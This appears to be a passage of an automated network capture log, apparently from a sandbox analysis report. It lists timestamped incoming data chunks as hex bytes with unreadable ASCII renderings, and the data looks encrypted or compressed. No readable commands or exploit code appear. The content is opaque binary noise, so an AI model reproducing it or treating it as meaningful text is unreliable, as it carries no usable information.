                                                                      2021-10-13 16:06:31 UTC172INData Raw: 22 9b 01 a4 f4 d2 cd 3a 27 74 da 71 57 83 28 5b 5e f7 7b aa bd 88 8f a0 f1 1d 0e d3 67 cf c1 6b d1 44 c8 dc ac b9 b4 bf 36 bb 33 e4 74 97 ec 2a 02 a0 a3 d9 ad 21 14 70 56 22 68 5a a9 b4 42 78 8f e1 dc 0b bd 26 0a 53 e8 4b ea 32 af ce 5d 56 e1 59 77 c8 9e a7 d4 c3 bc 24 91 8e 49 b4 cb 42 50 5f bc 94 57 ef ee de 3f cf 1e 10 1a 88 ff 55 d1 66 fa 2d 9a 9a 74 e7 f8 cc c2 d3 14 04 4d 0b 22 87 74 1f 97 74 54 d2 75 c3 6e af 62 e8 2e 41 85 ae 10 91 9b 8c 25 fc 99 55 f5 5a c2 99 0b a7 8f a3 e3 87 43 05 47 b3 b6 5f 70 7d c3 48 ab 2f c5 03 55 ee 3e 5d f1 9d e7 c8 08 50 f0 29 f6 8e 18 05 00 4c 78 0c d5 8e 94 fe d0 32 6c b7 e9 8d cd 01 fe 85 7f 65 00 fc 41 4a 44 e2 9b a3 55 b1 4b 76 8b 12 61 ee 44 09 08 75 c6 b8 4a d3 f0 45 31 03 e7 da e2 da e0 d9 0a 43 88 f5 1d eb 8f
                                                                      Data Ascii: ":'tqW([^{gkD63t*!pV"hZBx&SK2]VYw$IBP_W?Uf-tM"ttTunb.A%UZCG_p}H/U>]P)Lx2leAJDUKvaDuJE1C
                                                                      2021-10-13 16:06:31 UTC173INData Raw: 40 9c 0e 44 93 8e cc 9a 21 49 d4 e8 fb cd 6c 52 c1 4f 3c 52 b6 18 93 b9 09 e8 17 43 30 66 47 db 56 40 90 ad 63 60 1a 7d 55 70 9c 2b 1c 3d 01 c8 08 61 62 7f 10 6f 45 e7 d0 ab d6 b3 5a f6 c1 cb c8 09 3d 1d fb 68 71 43 4a 51 3e 0f a0 b2 15 3d d2 bd b7 5e 7d aa 24 73 e3 a7 e8 94 52 f5 0d 3a 28 8f fb 4c 92 40 55 11 41 c5 d6 58 91 67 e3 35 72 61 7f 6a 01 1d dc 63 8f 84 f8 a8 9a a1 9c d7 55 85 ab 1b e4 17 09 e9 e7 1c 1d 30 c2 58 44 b7 c5 f9 70 eb d2 ae 4c dd de 69 51 2d 41 d5 64 e5 15 b6 b7 09 3a 1d 8f f3 85 f4 2c 6f f3 be b1 03 f6 50 46 81 8b 7f fd 27 63 11 81 ea 3b 77 33 2c 81 4d a8 cd ef 51 97 b8 db 0c f6 f1 34 a2 b3 89 00 37 41 d9 2d cc 2d 89 26 10 2a 8e f5 02 1f 74 49 c4 e4 84 b6 e7 fc 07 b3 f3 2e f3 13 88 df f0 bb ad b9 81 54 e1 a4 63 47 a8 99 e3 26 4d 9c
                                                                      Data Ascii: @D!IlRO<RC0fGV@c`}Up+=aboEZ=hqCJQ>=^}$sR:(L@UAXg5rajcU0XDpLiQ-Ad:,oPF'c;w3,MQ47A--&*tI.TcG&M
                                                                      2021-10-13 16:06:31 UTC175INData Raw: 27 8b 6d ae 61 84 f5 ad 8c cd 01 e8 83 e0 d2 97 49 38 1e f0 ed df a2 55 b1 5d 70 14 d2 1e 59 3d 5d 18 49 82 b9 4a d3 e6 43 25 23 0f 98 9e 8f b4 29 4d 42 88 f5 0b ed 9b 27 eb b4 be bf 82 85 b0 80 d4 80 63 1e 7a e3 47 3e c9 bb 1c d9 86 64 58 8d ee b4 2f ee 02 90 5f 3b e0 eb 25 eb 8b 81 92 ba 95 6a 49 31 92 0f e9 58 07 9e d3 58 c3 63 53 38 a1 86 9d 3e d2 13 45 d1 c1 ab d0 65 63 68 4e 5a 04 60 0f 98 37 b0 8f 64 99 7f a5 68 fd 95 10 ac 19 40 11 2d 87 fc ea 31 07 5f fc 50 98 78 3c 01 c8 99 9c 08 87 f5 dc 57 fa be 42 16 be 10 ce 18 d6 ff 0c 4a 36 4b 88 d0 b4 f6 bf 8d db ad 00 af f8 47 1d c9 95 d8 f7 6a a6 22 86 ca 5d d7 6f 6e ed 8e 86 52 94 78 fe 1d 6c 14 27 e1 0b a8 72 0e 7a af 0f 6c 1d 84 79 58 e4 b7 43 4c b7 a0 15 46 44 a2 ad 17 11 b2 18 3f 4a 33 61 d1 21 c3
                                                                      Data Ascii: 'maI8U]pY=]IJC%#)MB'czG>dX/_;%jI1XXcS8>EechNZ`7dh@-1_Px<WBJ6KGj"]onRxl'rzlyXCLFD?J3a!
                                                                      2021-10-13 16:06:31 UTC176INData Raw: 8b 82 7d 29 27 b8 a3 b3 89 96 21 36 5a ca 8d 74 fb dc 9e a7 8f f5 02 89 62 a9 51 03 d8 ef 93 ea 38 21 f2 2e f3 85 9e 7e 73 5c de e0 f5 66 76 36 62 47 a8 0f e5 2c d9 7b 8f 0a 14 8b 4e d4 ab 72 cc 93 42 48 4d d5 84 af ce 88 34 29 01 54 e8 32 85 7a 0d 4c 3c 9f e0 19 e2 90 0b df 65 e5 03 d4 58 a6 4a 6c 5b 53 aa 20 9d 09 5b 6f 12 a5 75 c1 aa e4 70 eb 80 2a 5d 56 1e e4 e3 f9 d2 69 b2 c8 1c d9 d0 65 c9 c9 9d 4e 84 7f 92 4a a7 8d be c5 b8 31 e2 7c d2 57 0f 69 f9 45 8b 94 20 1b 74 54 24 60 0d 12 4a 42 32 69 bf e5 0a 97 22 08 55 e0 c9 74 17 1d 99 bb c4 d8 58 31 cc 9c a1 dc 4d 22 da bb c5 af 2a f2 43 32 5b be 92 5f d4 4c f0 bc 85 f8 c2 23 89 81 51 d3 60 f2 65 38 02 22 b3 1e 12 fb d2 8d 00 4f 0d 2a 4b f7 3a d2 3e b2 c0 4d c2 db ab 60 ee 26 9b 06 50 98 c4 7d 92 1d fd
                                                                      Data Ascii: })'!6ZtbQ8!.~s\fv6bG,{NrBHM4)T2zL<eXJl[S [oup*]VieNJ1|WiE tT$`JB2i"UtX1M"*C2[_L#Q`e8"O*K:>M`&P}
                                                                      2021-10-13 16:06:31 UTC177INData Raw: 8a e5 1b d7 87 ca 5d 41 69 28 d6 4d a7 0c e9 c9 3b e8 6d 14 27 77 0d 72 4e cd 29 fe 72 be d0 7e 78 58 e4 21 25 fe c0 56 04 3b 39 56 a9 ef 10 b2 18 a9 4c 1d 5c 12 e3 be 37 79 f5 78 ea ab 4a 88 a1 27 5d 8e c9 81 1e be 36 e8 3f a7 ab d9 da 3e 2c cc da 2f 63 65 dd de ea 21 3a 19 04 87 9b d9 c3 58 5d 82 a7 86 33 58 a6 bd 67 9e f7 2a d0 db 48 48 e6 f9 cb 74 68 72 66 93 21 50 86 69 b8 b7 e6 15 42 28 5c f4 8b 6e 3b 76 db 96 61 fa 73 57 71 9c bc 8b 2e b8 bb ee 03 95 7e 12 60 47 e6 d0 b7 47 a0 20 93 27 bd 3e 08 19 12 f9 79 71 d4 dd 27 fe 7c 46 78 e3 3c 94 b2 b5 48 7d 3d b3 e5 64 c2 0e 22 0d f5 6a 35 2a 89 e3 76 21 53 58 63 a7 77 27 59 19 68 e1 53 71 f6 e8 ea 28 7a 3a 69 7f 85 51 a7 98 a7 84 ed e6 96 ea 69 02 56 f9 e8 2d 13 1f 56 c1 2e c2 a4 ce 9f 96 bb 22 af a0 d2
                                                                      Data Ascii: ]Ai(M;m'wrN)r~xX!%V;9VL\7yxJ']6?>,/ce!:X]3Xg*HHthrf!PiB(\n;vasWq.~`GG '>yq'|Fx<H}=d"j5*v!SXcw'YhSq(z:iQiV-V."
                                                                      2021-10-13 16:06:31 UTC178INData Raw: 68 7f b1 69 66 f2 7f 3d 7b 81 be 6d ac 3b 62 bc 2b 61 fe 91 29 9b 6e ed 50 e5 78 d2 f2 55 98 7a 0a ec f5 83 42 20 95 3f 16 d4 e4 ee 1f 30 fd 67 4a 4b 5e 7a fb c9 f6 75 7b 14 ac e6 ad 93 47 0d db 9d f4 8a 6a 80 d5 d0 cd bb d5 14 76 f9 be a7 71 e9 78 a0 ea 96 15 c1 e3 70 b0 18 3e 29 83 72 6c 4b 7c a0 5f 02 b5 58 4f b3 a5 04 46 39 a2 32 ed 67 b0 fe 3d 31 2b cf e1 e3 c3 37 6f 6d 7a ec a1 ac 1c dc c4 ea 7d c9 fc 1e 86 ae ea 9b a5 4d 4d a7 52 f3 3f da 52 63 3c 45 dc ad 35 dc 8d 79 d2 63 2a c3 25 5d f8 3f 84 fd 5a 40 29 1a b0 e3 da d0 a6 48 d4 7e fb 44 60 8e e6 1b 1f 1d a0 86 14 b8 09 7e 17 ba 2a ba 60 f6 75 51 86 db eb 61 1a eb 55 82 89 5a 1f 53 01 3b 1e 03 e8 7e 10 f9 45 c4 d3 51 d3 dd 5a 23 d7 bd 43 08 3d 8b fb 8f 67 32 49 5a 1d b8 b6 78 9e 3c d2 2b b7 1e 7e
                                                                      Data Ascii: hif={m;b+a)nPxUzB ?0gJK^zu{Gjvqxp>)rlK|_XOF92g=1+7omz}MMR?Rc<E5yc*%]?Z@)H~D`~*`uQaUZS;~EQZ#C=g2IZx<+~
                                                                      2021-10-13 16:06:31 UTC179INData Raw: f9 2f 9f a5 84 70 b1 ae a5 f0 be a0 bb f9 e7 9a d0 bc 0f dc ce a1 89 e9 20 82 70 4c 15 86 0f f9 4a bf 16 8d bd 98 0a 2b 26 fe 50 06 cb 9f 17 b5 a0 5f c6 a5 58 e1 c8 da 90 3a 4f c9 da d0 e0 4b 28 8f 43 c6 5f 93 94 b9 d6 a7 f0 5f be 1c c0 5e 89 69 55 c8 52 14 67 d3 02 f4 96 fa 10 86 d2 82 04 14 0b cc 49 1c 3a 36 04 56 c2 30 c2 f8 af fe dc c0 99 ed 50 d6 e1 99 90 60 fd 0f 55 76 5a 2c bc 68 82 63 d0 e1 d7 06 04 d1 b3 4a 6d 9e 3e a0 b6 a3 5f c7 5f 10 ef a8 5d bd 9a 09 53 7a 7e da 58 f4 1e 5d 04 96 4c c8 0c 3b 24 e6 66 9e 43 6e 2b ac 8c 5b 01 61 82 91 d1 5c 4d 2a 3c 46 32 de a2 c3 b1 6f 77 65 d1 3d 52 d1 7f 0a a9 83 b9 dc d3 21 42 df 26 86 93 50 ad e2 c9 4c 42 1e f5 47 ea 61 22 c8 bf 16 9d 1c 65 b1 80 42 80 8c 1f 0b e0 91 14 42 99 9e 38 87 64 ce 8d 24 b3 5e ed
                                                                      Data Ascii: /p pLJ+&P_X:OK(C__^iURgI:6V0P`UvZ,hcJm>__]Sz~X]L;$fCn+[a\M*<F2owe=R!B&PLBGa"eBB8d$^
                                                                      2021-10-13 16:06:31 UTC180INData Raw: 5e 1f 8b 8c 1d 92 d9 eb 61 8c 7d 60 50 7a be 60 2e 1b 94 0a 01 e8 7e 86 6f a3 e2 36 b5 ac a0 66 aa c3 bf 43 08 ab 1d 93 58 97 d6 36 27 43 53 a2 7a 9e 3c 44 bd a7 4d 9b 3f 58 e5 40 fb ea 20 70 f5 9b 3a fa a8 05 74 ca 53 f7 4d 43 75 5a 59 07 67 a2 56 97 f4 03 ea e4 41 de 6b 02 85 6e a8 49 82 62 ef 0d 96 4d 47 e6 54 84 e8 71 1c 76 53 27 2c 29 a4 cd a6 72 b9 5f af da dd c4 00 b4 b8 3d 2b 4c ba 17 d6 3a 08 ac 1d 1a e7 7b b6 74 e9 b9 e1 b3 d7 7b 51 d0 81 78 59 1b b2 1f 3a ce b5 39 5f bd 2d 17 4d 65 de 09 c4 eb 89 73 53 f4 25 ba a3 25 89 1d 10 a7 4c 51 8f a7 d5 24 9c a5 8f 63 02 e8 67 af 51 98 da 42 bd fe 3b 23 f2 b8 f3 54 af 39 65 c7 dc 6f db 56 75 34 62 d1 a8 ab e3 c0 d8 e0 8d 64 3b c7 4d d6 ab e4 cc 19 70 ab 59 4e 86 e7 e1 e0 37 2b 01 c2 e8 f8 83 a2 0c d7 3e
                                                                      Data Ascii: ^a}`Pz`.~o6fCX6'CSz<DM?X@ p:tSMCuZYgVAknIbMGTqvS',)r_=+L:{t{QxY:9_-MesS%%LQ$cgQB;#T9eoVu4bd;MpYN7+>
                                                                      2021-10-13 16:06:31 UTC182INData Raw: 40 76 79 5f 08 a9 83 2f 4a 10 f3 a5 3b 59 fb d6 da 8d e0 c9 4c d4 88 4a 0a 0b 85 5d b5 d8 fa bd 1e 65 b1 16 d4 8d 76 f8 ef 9f ec 9d 8d b9 9c 38 87 f2 58 b8 e6 52 ba 92 c9 10 1b 39 c8 09 24 7d 8b b6 80 5c 8b 10 59 f6 d6 0d 5d b3 06 08 d3 91 cf 85 95 44 2a 78 d9 3c a6 ff 44 47 c1 ca c2 83 f6 14 30 61 43 62 f3 68 36 26 8f ef 94 99 bb 12 83 8c 57 ae ad 62 11 bb 87 69 e8 cf 3f 07 ef 03 df 7a 44 f2 c9 0f 9c 13 b1 13 49 2b 22 e1 05 14 42 e4 cf 8e d6 40 1e ac a3 37 78 6e f3 f4 e3 7b da 3b 00 94 cf a1 03 b3 9f 42 b0 68 16 d5 87 5c 5d 3e 6d 90 d5 d6 a5 a9 d3 7a 36 ea 6d 82 27 8a 2c 56 4a 56 2b 7a 48 6e dd 7c 78 ce e4 a4 20 a9 c3 cd 06 5c 02 a0 a4 ed 10 24 18 b7 68 cd 59 89 e1 f8 0c 6d fb 7a ea 3d 4a 5a a4 22 5e 15 cb a0 25 84 38 ea 3f 31 ab b0 fd b4 29 57 d8 2f 58
                                                                      Data Ascii: @vy_/J;YLJ]ev8XR9$}\Y]D*x<DG0aCbh6&Wbi?zDI+"B@7xn{;Bh\]>mz6m',VJV+zHn|x \$hYmz=JZ"^%8?1)W/X
                                                                      2021-10-13 16:06:31 UTC183INData Raw: d7 91 fc 3b 23 64 2e d7 18 78 dd 1a ba ab d8 f7 54 75 34 f4 47 6d 9b 03 24 a7 9d 14 32 16 c5 4d d6 3d 72 4a 11 a4 4f 26 33 3c 97 cc e2 37 2b 97 54 07 a6 63 46 73 aa e2 a7 e2 9c e1 92 9d df d3 67 e5 de 32 40 b6 54 59 f3 a9 22 0b 09 42 fa f4 cf 0b 27 88 df 72 57 83 28 cb 56 09 64 05 be b8 8f f1 f3 1e 0e d3 67 5f c9 d0 db 62 ca ec ac c7 b6 bc 36 bb 33 74 7c c5 d6 e9 04 93 a3 0a af 22 14 70 56 b2 60 7a 87 ac 41 4b 8f 19 de 08 bd 26 0a c3 e0 9d f5 f1 a9 fc 5d 00 e3 5a 77 c8 9e 37 dc 8b b7 3c 92 bc 49 c0 c9 41 50 5f bc 04 5f 16 cd 16 3c e2 1e ca 19 8b ff 55 d1 f6 f2 75 aa e4 75 ca f8 3c c1 d0 14 04 4d 9b 2a 73 78 dc 91 58 54 8c 77 c0 6e af 62 78 26 a1 94 b6 13 bd 9b e0 27 ff 99 55 f5 ca ca 72 0f 64 89 8c e3 46 41 06 47 b3 b6 cf 78 58 d9 50 a8 00 c5 ec 57 ed 3e
                                                                      Data Ascii: ;#d.xTu4Gm$2M=rJO&3<7+TcFsg2@TY"B'rW(Vdg_b63t|"pV`zAK&]Zw7<IAP__<Uuu<M*sxXTwnbx&'UrdFAGxXPW>
                                                                      2021-10-13 16:06:31 UTC184INData Raw: 6c dd 7c ee 58 93 b1 c3 4d bc b0 a0 17 3b a2 a4 ed 86 b2 e8 0b aa 29 26 f4 29 92 35 6f fb 7a 7c ab 37 1f 47 c6 21 68 21 ad 1c 86 38 ea a9 a7 7a 49 3c 50 56 2a d3 00 61 3c d3 dc 7c 21 fa 8e e2 d0 e4 3f ec 77 5f f8 a9 84 a5 58 e3 2c 81 b2 82 cc 9d f4 4a d4 e8 fb 5d 74 9a e5 80 1d 5e b6 f4 46 ba 09 e8 17 d4 28 27 65 6d 77 4c 90 4b b9 63 1a 7d 55 e7 9c d8 1f c8 03 c4 08 b2 ba 7c 10 6f 45 70 d0 91 d8 46 58 fa c1 6a 11 0a 3d 1d fb ef 71 4f 49 c1 1f 03 a0 8c cc 3e d2 bd b7 de 7d 72 2e 03 c2 ab e8 37 23 f7 0d 3a 28 1f e3 be b5 b5 57 1d 41 4d 09 5b 91 67 e3 c5 71 7f 6a 0c 22 11 dc 32 51 87 f8 a8 9a 31 84 1f 72 70 a9 17 e4 2f d7 ea e7 1c 1d c0 c1 97 40 42 c7 f5 70 25 0c ad 4c dd de bb 52 a6 43 cd 67 e9 15 6b 69 0a 3a 1d 8f 74 9d ae 1f 0f f1 b2 b1 08 28 53 46 81 8b
                                                                      Data Ascii: l|XM;)&)5oz|7G!h!8zI<PV*a<|!?w_X,J]t^F('emwLKc}U|oEpFXj=qOI>}r.7#:(WAM[gqj"2Q1rp/@Bp%LRCgki:t(SF
                                                                      2021-10-13 16:06:31 UTC185INData Raw: 04 db 0d cb 60 87 38 ee 25 8f 9f 32 c2 6e af f4 ee af 9e 76 52 6c c0 66 cd 62 fd 99 55 63 5c 2d 8e f3 80 f6 f1 fc 89 04 04 47 b3 20 59 cb 39 3b b4 d7 7d 85 01 12 ef 3e 5d 67 9b fe 60 e1 7c 8c 7a 94 40 5f 04 00 4c ee 0a 36 23 7d 64 ae 61 e8 75 ae 8c cd 01 68 83 4c e2 c7 4f 38 1e e2 6c dc a2 55 b1 dd 70 a5 d5 a6 50 3d 5d c0 f7 81 b9 4a d3 66 43 36 16 1d 91 9e 8f 09 97 4e 42 88 f5 8b ed d7 26 53 bd be bf 14 3a b3 80 d4 80 e4 1e ba d0 0a 16 c9 bb b0 67 85 64 58 8d 69 b4 c2 e9 2f b8 5f 3b 86 56 26 eb 8b 81 12 ba 7a 59 bf 38 92 0f 2d ec 04 9e d3 58 43 63 17 38 cc 94 9d 3e 34 a0 46 d1 c1 ab 50 65 20 6f d6 73 04 60 47 37 34 b0 8f 64 19 7f 7a 6e 65 bc 10 ac 7b 3d 13 2d 87 fc 7a 29 75 7d 09 52 98 78 b3 ad cb 99 9c 08 07 f5 be 57 c4 97 42 16 5a 84 cd 18 d6 ff 8c 4a
                                                                      Data Ascii: `8%2nvRlfbUc\-G Y9;}>]g`|z@_L6#}dauhLO8lUpP=]JfC6NB&S:gdXi/_;V&zY8-XCc8>4FPe os`G74dzne{=-z)u}RxWBZJ
                                                                      2021-10-13 16:06:31 UTC187INData Raw: aa 62 ef 71 97 c8 67 02 56 2d e8 03 37 f7 54 00 2e 6e 81 d6 88 79 b8 65 8a bd df 1f 2d fd b2 b7 29 a4 94 63 de c4 09 fb 1d 23 fa 63 b6 c8 e9 c9 e0 a2 d7 6a 50 c5 94 88 6a e4 b1 cd 11 af 98 22 5e 52 1e 8e 4e 81 da 40 ed 9c 8a ce 7c ae 33 61 a1 7a 89 83 06 57 4d e5 8f 76 f7 3a 9f 9c 8e 4f 0e 56 63 80 53 7c c3 81 93 bd 3a e7 d6 0c f0 52 9f 6d 43 3c dc b4 f4 9a 65 1c 61 6e a9 3a d6 0b d9 b4 8c c7 33 f1 4e 87 aa db ef 39 41 94 5b 8b b4 92 cd 3b 37 4d 12 13 eb 7d 85 34 1e b9 3e 83 e1 b7 fa 98 08 be 64 60 20 91 4c 29 49 b7 44 75 a9 53 9c 33 7e ea 12 ac 77 b6 bd c0 73 d6 82 38 4d 08 1d f3 e2 b8 e9 eb b3 3c 1d ee f7 2e c8 58 9c 6d 8f a2 92 15 a4 7f ae b2 b8 f2 e3 fb fa 4a 0c 9f ef d4 a1 78 23 8d 71 c5 37 9e 0c 1d 4b bc 19 17 be 01 0b 47 0a f4 54 79 c8 60 3e 33 82
                                                                      Data Ascii: bqgV-7T.nye-)c#cjPj"^RN@|3azWMv:OVcS|:RmC<ean:3N9A[;7M}4>d` L)IDuS3~ws8M<.XmJx#q7KGTy`>3
                                                                      2021-10-13 16:06:31 UTC188INData Raw: f1 a0 30 7b 71 52 fa b9 34 e9 9b 5c 86 b6 b9 d1 88 80 64 95 ae 58 34 b5 84 1d ef f0 10 38 e6 69 e6 74 70 dc c8 70 9f 6d b1 a5 42 bf 21 11 32 5f 43 4d cf 9b f2 b6 1b e3 a1 ee 6d 80 c0 df e3 b9 d3 2d 09 5e ed 8c 1e eb 9b 05 89 c0 09 f0 83 cb 59 46 7c 3f d6 5a a6 f2 fe 5d 32 1b 6e ae 38 c4 09 19 48 a4 08 ca 73 8d de a5 55 c5 ed 06 25 f3 c1 74 0f f7 39 0b a4 26 19 5b 1a 88 46 83 5e 1d e3 59 22 bd f2 2e ea 9f 42 9c a6 cd 58 cb f8 26 17 37 38 7b 2a 11 af a6 d8 c8 3e cd d1 fb 63 84 fb 05 ef 70 38 b5 21 6e 9d 96 c1 2b 71 d3 a3 08 33 59 95 12 6d 3c ff 42 c8 99 42 7d e8 6a de 3d 69 75 67 a3 23 f0 8e 1d bc aa db 5c 48 31 58 58 ae c9 35 a1 dd c5 77 86 77 74 75 a6 99 a1 2a 90 b8 39 12 4b 74 39 6b 7f c3 c3 b7 e8 a4 60 a2 d2 bf 0a 0c 8d 2f 47 7d 20 d0 f6 22 a1 7a f1 7e
                                                                      Data Ascii: 0{qR4\dX48itppmB!2_CMm-^YF|?Z]2n8HsU%t9&[F^Y".BX&78{*>cp8!n+q3Ym<BB}j=iug#\H1XX5wwtu*9Kt9k`/G} "z~
                                                                      2021-10-13 16:06:31 UTC189INData Raw: 89 99 bd dc 0e e2 61 2a ef db ce ad ce f1 b8 e9 e6 8f 30 99 16 71 7b e3 c7 81 1c bd b5 b0 ef a7 24 39 57 2d 64 30 90 ce 55 ef 8f e0 8b fa ab c7 08 1c f5 12 e0 be ab 4f 74 e4 b2 c9 73 19 99 86 cb e4 b4 b5 84 49 5e 81 8f 39 62 9c ab c3 5e 89 c9 38 29 de 18 4e 57 46 e8 1c d7 f5 d6 92 b9 93 76 26 ed cb 84 43 15 b8 4d 4c 32 da 65 39 95 c0 41 6b 30 ad 7a 00 7a 47 26 7e bd bf 09 d1 9a 19 4c 38 9c c4 f4 c4 eb 5b 00 e3 8d cb c6 c4 06 e5 46 89 93 4b 62 2d dc db b2 fa c3 4e 11 86 14 da f7 da ed c8 23 4c f5 73 f3 3f 49 17 00 4d 7d e8 ff 97 81 17 d5 94 42 f3 af fd cb d9 d7 34 6d 7a 21 77 60 dc 5e 0b dd c5 5c bd 50 c1 83 f2 41 4c 5b a1 08 93 a6 aa 4a d7 f1 79 1c 5c fc 6f e3 bb e8 4b 4b be 88 28 33 c3 86 71 b4 54 cd 83 1d 99 b1 0e ce f5 74 1a ec 75 ed b5 b3 bf 9d af 86
                                                                      Data Ascii: a*0q{$9W-d0UOtsI^9b^8)NWFv&CML2e9Ak0zzG&~L8[FKb-N#Ls?IM}B4mz!w`^\PAL[Jy\oKK(3qTtu
                                                                      2021-10-13 16:06:31 UTC191INData Raw: 38 45 28 21 10 78 0d 4f 62 42 72 06 9c ff eb 48 1b 07 65 99 9f 75 1a 72 14 77 0c 78 ed f0 0a d4 62 f7 d1 1b fd 65 5f 56 c6 30 53 d6 1a ac fb e8 64 30 6c fe 1a f1 b0 96 b9 dd d5 87 92 88 7d dc 22 33 e6 d8 ec 09 72 fc 2a 3f 00 60 e4 f8 ad 58 7d 91 46 4d 49 c0 96 4e e1 dd 6b d6 7a fb 22 1a cc 78 02 ec fb 0a b6 27 88 b4 71 07 be a4 e0 10 85 d2 c2 0f 1d 1a c0 14 71 b7 c5 a1 71 a0 57 11 64 64 d9 d6 4b 19 43 92 62 bc 06 13 12 4c 3b 29 87 60 9a f0 08 9b c1 15 b6 9b 7a 8c 68 af 8a 60 f9 38 4d f3 8d cf 3a 65 98 ed 8a 01 a9 ef e7 44 91 80 fb fa e6 f8 92 ff b2 54 2e 0f 40 12 2d 01 13 8e 20 c0 a4 bb fd 80 18 3e 48 69 c0 c9 92 aa ff d0 08 69 07 ca 10 16 c9 49 bb e5 9e 4f 47 d6 1d 3e 46 8a bc 22 21 be 9c 39 59 84 c5 29 d7 e0 42 e9 01 43 49 e3 1b a2 d3 b7 e6 87 19 bd 50
                                                                      Data Ascii: 8E(!xObBrHeurwxbe_V0Sd0l}"3r*?`X}FMINkz"x'qqqWddKCbL;)`zh`8M:eDT.@- >HiiIOG>F"!9Y)BCIP
                                                                      2021-10-13 16:06:31 UTC192INData Raw: bd 5d b1 db 75 bb ff 48 52 d4 58 35 85 aa b9 39 d3 35 43 17 24 60 84 7a a3 ce c9 ef 55 2a d9 33 ed 2c 37 74 93 83 bf 35 65 f4 80 94 80 61 1e f0 e2 af 14 a7 bb 81 38 c4 64 43 8d d3 b4 f1 ef ba ba f9 3b ab 09 3f eb a7 81 e7 ba 9a 6d 44 3a 86 0f 2e b3 f2 9e 53 58 fe 63 d2 39 a9 96 fb 3e 8a ff c7 d1 ba ab 83 65 77 69 b3 71 3c 60 7a 68 45 b0 89 65 2f 7f 92 6f c6 be cc ac 66 62 54 2d 26 fc 3f 29 78 7a 4c 50 f6 78 59 f2 6a 99 5f 08 ef f4 8b 56 09 95 7a 16 81 e4 2c 18 d5 fd d9 4a b2 4a 65 fb 29 f6 c8 7b 9f ad e3 af 6d 47 44 ce 9f f5 a1 6a 53 d5 87 cb 4e d7 74 76 f7 aa b6 71 f4 78 16 eb 46 14 62 e1 4d b1 63 2b 6e 83 32 6d ce 7c 65 58 84 b6 36 4f dc b0 66 47 12 a2 e1 ed 90 b3 33 3f 09 2b fb f5 ca c3 72 6f 3b 7b c1 ab 0f 1e 61 c5 4f 68 d6 fc fe 87 13 ea 7a a7 ab 4d
                                                                      Data Ascii: ]uHRX595C$`zU*3,7t5ea8dC;?mD:.SXc9>ewiq<`zhEe/ofbT-&?)xzLPxYj_Vz,JJe){mGDjSNtvqxFbMc+n2m|eX6OfG3?+ro;{aOhzM
                                                                      2021-10-13 16:06:31 UTC193INData Raw: 1c 1f 62 e5 5c 29 c7 92 93 39 1a 16 ec 2e f3 51 82 1d 69 ba dc 19 fb 6e 6b 34 62 be a4 5b eb 26 da c0 92 b5 1a c5 4d 25 99 a2 d1 05 42 96 53 09 98 d2 ce 8b 3f 11 1f 54 e8 b4 91 75 11 aa 3e d6 e9 94 ff 92 0b 73 4d 64 20 dc 4f 35 67 dd 46 f3 a9 46 b9 14 78 f9 12 d2 6a e5 a6 99 70 9d a8 c6 75 56 1e a7 ec 08 ec 8f b0 67 31 c2 ce 67 c9 c2 b6 62 ad c8 91 b5 a2 c5 a0 36 bb 69 ef be dc c1 0f e6 e7 61 87 e9 20 f9 73 94 2a 60 0d 41 69 81 38 8d bd 9c 0a be 26 08 55 e5 c9 e7 17 a9 81 5b c6 a2 58 75 c8 99 a1 d5 4d b6 da 9f c1 42 28 8d 43 44 5f b1 92 5e d4 cf f0 33 9f 1c c0 48 89 f0 55 d0 60 e5 65 a1 02 75 b7 85 10 97 d2 16 04 33 0d 39 4b 60 3a ec 25 47 c2 32 c2 70 ae 77 ee 27 9b 8f 51 04 c0 99 90 40 fc 8e 55 f4 5c eb bf 02 82 89 f1 c1 d6 1f 04 46 b3 95 58 61 3c df b6
                                                                      Data Ascii: b\)9.Qink4b[&M%BS?Tu>sMd O5gFFxjpuVg1gb6ia s*`Ai8&U[XuMB(CD_^3HU`eu39K`:%G2pw'Q@U\FXa<
                                                                      2021-10-13 16:06:31 UTC194INData Raw: 53 d1 40 29 65 31 14 bb 3a 09 3a bb 8e 8f 9d b6 09 06 f2 a0 b1 d6 7b a1 47 ee 8b 6b fd 41 63 4b a5 9a 3b ad bc 5c 81 4f a8 23 ee b5 96 88 ff 84 f7 56 ba a1 b3 73 01 54 41 4f 2c 74 08 8e 26 9e a5 73 f4 75 1f 63 49 ae e4 ad 92 91 fc c5 22 8b 2e f2 13 61 de 1e ba de 9d d6 56 0e 34 63 47 8c 9b 9e 26 d8 9d a8 75 69 c5 4c d6 8d 70 b1 05 40 4d 7c 31 f9 d2 cf e2 1f 29 7e 54 ea a4 ac 46 8f aa 3f e2 ca 9e 60 92 11 df 3d 71 48 d8 54 40 c6 13 10 f7 98 22 a3 0a ee fd 23 cd 36 24 1f 9d 41 57 c1 2b e4 52 2f 72 a7 bf 7e 8b 84 b5 68 0d ef 64 f0 c9 e5 db 2b c8 dc ac e5 f4 11 36 c5 33 80 65 45 c1 81 1f 6a ba e4 f0 5a 0d 05 56 73 79 67 84 3b 43 4e 8f c2 98 59 bc cc 0b a4 e1 94 e4 99 ad cb 5a 9c a2 39 70 a7 99 11 db 9c b3 f0 98 f0 43 6d 84 50 40 78 ac eb 4d 9a c9 6e 2a 37 0a
                                                                      Data Ascii: S@)e1::{GkAcK;\O#VsTAO,t&sucI".aV4cG&uiLp@M|1)~TF?`=qHT@"#6$AW+R/r~hd+63eEjZVsyg;CNYZ9pCmP@xMn*7
                                                                      2021-10-13 16:06:31 UTC195INData Raw: 17 8a 22 84 1a 28 97 a9 a8 9c 41 d2 9a 27 3a 47 f6 4b 7f 2d 8a af 29 d6 ba 6c 2f cf 3e 30 9a a7 92 8f 1e a8 cd 31 af a7 0b 68 bd eb 94 bb 6a 5e 98 c6 89 0e 9f 28 43 e6 99 a5 30 8d 0e 57 9a 04 27 15 e1 66 d5 3a 45 4e ef 41 5e dd 31 11 3b 96 d8 56 20 a7 c4 28 11 50 cc 97 df 10 c7 6b 5a 3e 18 69 f4 b3 a6 56 0b ae 33 84 df 79 2c a1 90 33 3d 82 92 6a b5 0a ea 6d c2 ca 2b 93 3c 5f 19 ea 52 37 53 9a b2 9e 12 08 8f 4f b7 e0 69 a0 49 28 9d f9 e5 5a 2a c6 19 67 f4 96 af a6 cf 27 ba 89 89 b2 14 5a e4 3f 7f 10 b6 d0 7b ed 40 86 63 74 1c 5c 30 ee 14 55 d9 b7 9f 57 2e 7d 01 1e d5 d2 69 18 35 b9 45 45 dd 7e 42 0a 24 82 85 fe bf d4 6b b1 c1 eb 2c 5d 74 73 8f 48 47 d4 19 42 7c 1a e9 14 ea 